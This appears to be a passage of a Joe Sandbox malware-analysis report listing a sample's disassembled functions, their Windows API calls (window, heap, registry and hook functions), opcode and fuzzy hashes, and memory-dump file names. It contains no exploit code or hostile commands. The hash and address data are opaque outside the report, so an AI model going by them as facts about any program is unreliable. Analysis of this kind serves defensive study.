Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e11a1a5f31f4cb33b024c01f2dbf4c1542a7e5af66afb4619ba965c6068a4425
Instruction ID: cfda056f3e1bfb89349e09b922290d6e6db6a01bb08bf723edffdc8e6ae5ea85
Opcode Fuzzy Hash: e11a1a5f31f4cb33b024c01f2dbf4c1542a7e5af66afb4619ba965c6068a4425
Instruction Fuzzy Hash: 4C110A71204750ABC310DF59D880F97B7E8FB48B14F80063EF46497681D738E8058BA6

Function 00457CE7 Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838

GetWindowRect.USER32(?,?), ref: 00457D0C
GetWindow.USER32(?,00000004), ref: 00457D29

Part of subcall function 00459926: IsWindowEnabled.USER32(?), ref: 0045992F

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Window$EnabledLongRect
String ID:
API String ID: 3170195891-0
Opcode ID: e782368540316d1cacdbfc55745b2c3869e6f7dbff5383a13291f65101c725e8
Instruction ID: 375d3ee3df655b8212e251599233aac5bdcbf11d9cda8cb0e33f1c270f2b4009
Opcode Fuzzy Hash: e782368540316d1cacdbfc55745b2c3869e6f7dbff5383a13291f65101c725e8
Instruction Fuzzy Hash: 3101A7316046089BDF14EF25E855BBF77B5AF05306F00446AED02973A3DB78DD0D8A58

Function 00447CA5 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00447CC3

Part of subcall function 0044D832: EnterCriticalSection.KERNEL32(?,?,?,00447CC8,00000004,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 0044D85A

RtlFreeHeap.NTDLL(00000000,?,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 00447D0A

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: CriticalEnterFreeHeapSection__lock
String ID:
API String ID: 3012239193-0
Opcode ID: ac1540a0b851fcdb40e3e79ba1efe0328e53520ba3295f022b908cb1df8d684a
Instruction ID: d955b6addba1c6b7a19bfec433c3d98e9b43adaac541c227c5d3499d9416ad9c
Opcode Fuzzy Hash: ac1540a0b851fcdb40e3e79ba1efe0328e53520ba3295f022b908cb1df8d684a
Instruction Fuzzy Hash: 96F0B471D16315AAFF207B62AC07B6F7B60AF00769F20412FF410652D1CB7C5A52DA9D

Function 00447E08 Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00447E2A

Part of subcall function 0044D832: EnterCriticalSection.KERNEL32(?,?,?,00447CC8,00000004,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 0044D85A

RtlAllocateHeap.NTDLL(00000000,?,004CAFE8,0000000C,00447E93,000000E0,00447EBE,?,0044D7B5,00000018,004CBC70,00000008,0044D84B,?,?), ref: 00447E6B

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: AllocateCriticalEnterHeapSection__lock
String ID:
API String ID: 409319249-0
Opcode ID: c04b9e8e06a6364d5c1f494db0ccfd713c89f64cbde72ec4706e017656008a0b
Instruction ID: f1a8fd19c40bd1083452c9b815fd926fceb10cfad15d11fd48909767391a0784
Opcode Fuzzy Hash: c04b9e8e06a6364d5c1f494db0ccfd713c89f64cbde72ec4706e017656008a0b
Instruction Fuzzy Hash: 31F0CD32D416249AFB20BB759E0675F7760BB10728F30436BE8202A3E1C73C1D52CA8E

Function 0045DD12 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetWindowTextLengthA.USER32(00000000), ref: 0045DD2C
GetWindowTextA.USER32(00000000,00000000,00000000), ref: 0045DD41

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: TextWindow$Length
String ID:
API String ID: 1006428111-0
Opcode ID: 720720b7826cd516c124d1c9f667a6bb5a0a754d63c71446cbaca4b57f6d7706
Instruction ID: 3df95a50f7c5756162ba1c81e646130b5dca14df09544dfd3e809bef63806a36
Opcode Fuzzy Hash: 720720b7826cd516c124d1c9f667a6bb5a0a754d63c71446cbaca4b57f6d7706
Instruction Fuzzy Hash: 59F0E932100105EBCB20AF51DC04DAF772DEF49362F04011AFD1547151DB385415CBA9

Function 004305C0 Relevance: 3.0, APIs: 2, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,80000002,?,?,?,0043062F,80000002,00000000,?,00402EF7), ref: 004305EC
GetLastError.KERNEL32(?,?,0043062F,80000002,00000000,?,00402EF7), ref: 004305F9

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: ErrorLastQueryValue
String ID:
API String ID: 1349404517-0
Opcode ID: 4b12fa7677ebd328b7f12a0ba8178812c3b22382074bc9e6808d752de9ad009f
Instruction ID: fe9462d29a9da7b837a2406539751575587682de2b60d7ac772098d07a0583a7
Opcode Fuzzy Hash: 4b12fa7677ebd328b7f12a0ba8178812c3b22382074bc9e6808d752de9ad009f
Instruction Fuzzy Hash: 0FF01C722042116BD314CB58EC04F5BB7E8EBD8B51F10822EFA86D7280DBA0991587A9

Function 00456289 Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 004562B0
CallWindowProcA.USER32(?,?,?,?,?), ref: 004562C5

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: ProcWindow$Call
String ID:
API String ID: 2316559721-0
Opcode ID: 7c14ae1876ad108138e0c2b43aed3fef796ce7489ec108068f17dd744e4f0651
Instruction ID: 724d7a8fdadb4652615dbb9f4325778996f429c979f1ed0c0a89b8764ad68d23
Opcode Fuzzy Hash: 7c14ae1876ad108138e0c2b43aed3fef796ce7489ec108068f17dd744e4f0651
Instruction Fuzzy Hash: 2FF01C36100605FFCF215F95DC04D9A7BB9FF08352F418469F90987631D776E824AB54

Function 0044D68E Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,004481DD,00000001,?,004CAFF8,00000060), ref: 0044D69F

Part of subcall function 0044D863: HeapAlloc.KERNEL32(00000000,00000140,0044D6C7,000003F8,?,004CAFF8,00000060), ref: 0044D870

HeapDestroy.KERNEL32(?,004CAFF8,00000060), ref: 0044D6D2

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: bcabe9e55bb853ce9606875af35cc23512099b3aa20cb19af125bf1c2520e8ce
Instruction ID: 75e7420880b69f34e065517e2ae9d8fd4c88d18d1bcf8fff13bf1802494dd5c5
Opcode Fuzzy Hash: bcabe9e55bb853ce9606875af35cc23512099b3aa20cb19af125bf1c2520e8ce
Instruction Fuzzy Hash: F1E0D871E113006BFB006F357E0832637D49B45345F014937F405D5294FB748410DA0E

Function 00458AD3 Relevance: 3.0, APIs: 2, Instructions: 25threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A

GetCurrentThreadId.KERNEL32 ref: 00458AF5
SetWindowsHookExA.USER32(00000005,Function_000588B4,00000000,00000000), ref: 00458B05

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: CurrentH_prologHookThreadWindows
String ID:
API String ID: 2183259885-0
Opcode ID: f41d2774eea753fce7038d8cf1bba76ec0a83b13827fae0ef50e3a3f985bd47e
Instruction ID: 5f91b5a6e92888a10516239ab813794ae4ba7b6c56ba3dc280b3d2880adb0640
Opcode Fuzzy Hash: f41d2774eea753fce7038d8cf1bba76ec0a83b13827fae0ef50e3a3f985bd47e
Instruction Fuzzy Hash: FAE09B717407009BD2306F125C0971776A8DBC4B27F10453FF945AA245DE74684CC67F

Function 004306A0 Relevance: 3.0, APIs: 2, Instructions: 17registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: ErrorLastOpen
String ID:
API String ID: 3359735512-0
Opcode ID: 35defb75280334056dcad91695dd74def03daa0eb104eab090d3a280f410746c
Instruction ID: d694ad6d0416bea9128f64c78c3a1527c4c8503895f06f341b73c71a9d6b33f9
Opcode Fuzzy Hash: 35defb75280334056dcad91695dd74def03daa0eb104eab090d3a280f410746c
Instruction Fuzzy Hash: 7CD05E313057107BC3749B58EC04FA7BBD8EB88B80F00842AFA49C3250DAB0D840CBB5

Function 0045B7C6 Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0045B7D9
SetWindowsHookExA.USER32(000000FF,0045B648,00000000,00000000), ref: 0045B7E9

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: CurrentHookThreadWindows
String ID:
API String ID: 1904029216-0
Opcode ID: caa397c9cf1992df8d3d644f132b9f788036187670f4d340d85928ce480f1793
Instruction ID: e7a0d55e888616423550d49620b794bcb0c811eaca6d3862d66bd71e3f1928a1
Opcode Fuzzy Hash: caa397c9cf1992df8d3d644f132b9f788036187670f4d340d85928ce480f1793
Instruction Fuzzy Hash: B1D0A7314456506EE71027717C0DB9E3A50DB05326F150397F811551D2EB6845448B9F

Function 0043A5F0 Relevance: 1.6, APIs: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

LoadIconA.USER32(?,00000080), ref: 0043A722

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: IconLoad
String ID:
API String ID: 2457776203-0
Opcode ID: 987dc8aa1c4b3a391572c1f90d36992d096fb491d6f713308c818d54bd36514a
Instruction ID: 274c6e8b6375608b12aaefe698a568ec2b24333b2e26eb9f58feebfc558e2af9
Opcode Fuzzy Hash: 987dc8aa1c4b3a391572c1f90d36992d096fb491d6f713308c818d54bd36514a
Instruction Fuzzy Hash: 73318F746047419ED310DF6AC445B8BFBE4FF59704F40481EE4AA87281CBB86508CFA6

Function 00457D60 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00457D65

Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6a05e92a76c8c5ca9a0a769a5f5d4cc643f426d809164ab351f81e2bf9eae797
Instruction ID: 97e62bb5cb5176d189c6cd675d589d9c7a8179aa92c1a68fb220006335a56f75
Opcode Fuzzy Hash: 6a05e92a76c8c5ca9a0a769a5f5d4cc643f426d809164ab351f81e2bf9eae797
Instruction Fuzzy Hash: 15212472900219ABCF06DF58D4819EE7BB9FF48354F10406AED01AB241D778AE48CBA4

Function 00458B1F Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00458BBD

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 35e1d86da7a2f004a6cc6ac27d4f5fb8925abfabb8f493127d4efe08fda53b48
Instruction ID: cf859b758ff2acc04b1ecd057fffe6232e3ddb52d8bbd9ecb225a9b44f51b97d
Opcode Fuzzy Hash: 35e1d86da7a2f004a6cc6ac27d4f5fb8925abfabb8f493127d4efe08fda53b48
Instruction Fuzzy Hash: E731BB75A00219AFCF01DFA8C845ADEBBF5FF0C314B00446AF918E7210EB35AA519FA5

Function 004559FB Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00455A32

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Parent
String ID:
API String ID: 975332729-0
Opcode ID: 5d60539e9fe0d6b5907cec7b90cc82e219825c6b1399d7bebee3bb11f346e87e
Instruction ID: fd93277a5edab1037254a445adec77899b11dd427d2650e9889f3dc849f96d9e
Opcode Fuzzy Hash: 5d60539e9fe0d6b5907cec7b90cc82e219825c6b1399d7bebee3bb11f346e87e
Instruction Fuzzy Hash: 450161752106066B9F205E72DC94E7B7BAEEFC5366B004726FC11C3293E639DC149674

Function 00460C65 Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00460C6A

Part of subcall function 004609B0: TlsAlloc.KERNEL32(?,00460C94,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845,76F90A60,00000000,?,00448293,00000000), ref: 004609D2

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: AllocH_prolog
String ID:
API String ID: 3910492588-0
Opcode ID: 285b6ccc489d41c5de9a0535a65a64457fa7c9c7f49d3a8658ee213dc17cba7c
Instruction ID: a0d859e667a0056672296448471ca11741ce94952222560437a9cc5b95dec7d2
Opcode Fuzzy Hash: 285b6ccc489d41c5de9a0535a65a64457fa7c9c7f49d3a8658ee213dc17cba7c
Instruction Fuzzy Hash: 59014B75601211DBDB2ABF65E81176A77B2EBD0365F20853FE49193390EB789C00CB69

Function 00457E4D Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
